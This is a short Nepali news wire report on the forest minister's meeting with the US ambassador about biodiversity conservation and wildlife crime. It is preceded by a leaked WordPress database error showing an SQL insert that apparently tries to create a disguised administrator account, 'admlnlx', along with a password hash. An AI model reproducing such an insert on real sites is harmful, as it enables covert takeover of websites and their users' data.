WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bl4Qjd2QyeaGoGxewtEgTqplnYRK.8.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:13:36', '', 'admlnlx', 'admlnlx')
काठमाडौँ, फागुन ५ –
वन तथा भू–संरक्षणमन्त्री शङ्कर भण्डारीसँग नेपालका लागि संयुक्त राज्य अमेरिकाका राजदूत अलाइन बि टेप्लिज्ले भेटवार्ता गर्नुभएको छ ।
मन्त्रालयमा आज भएको सो भेटमा मन्त्री भण्डारीले वन मन्त्रालय नेपालको जैविक विविधता संरक्षणको क्षेत्रमा अमेरिकी राजदूतावास र अन्तर्राष्ट्रिय विकासका लागि अमेरिकी सहयोग नियोगसँग मिलेर काम गर्न चाहेको बताउनुभयो । वन्यजन्तुको अपराध सबैका साझा चुनौतीका रुपमा रहेको उल्लेख गर्दै मन्त्री भण्डारीले वन्यजन्तु अपराध नियन्त्रणमा अमेरिकी सरकारले अन्तर्राष्ट्रियस्तरमा पु¥याएको सहयोगको प्रशंसा गर्नुभएको उहाँको निजी सचिवालयले जनाएको छ ।
भेटमा राजदूत टेप्लिज्ले जैविक विविधता संरक्षणमा नेपालले हासिल गरेका उपलब्धि अन्य मुलुकका लागि पनि अनुकरणीय रहेको उल्लेख गर्दै प्राकृतिक संरक्षणका परियोजनामा अमेरिकाले पु¥याउँदै आएको सहयोग आगामी दिनमा थप वृद्धि हुँदै जाने विश्वास दिलाउनुभयो ।-रासस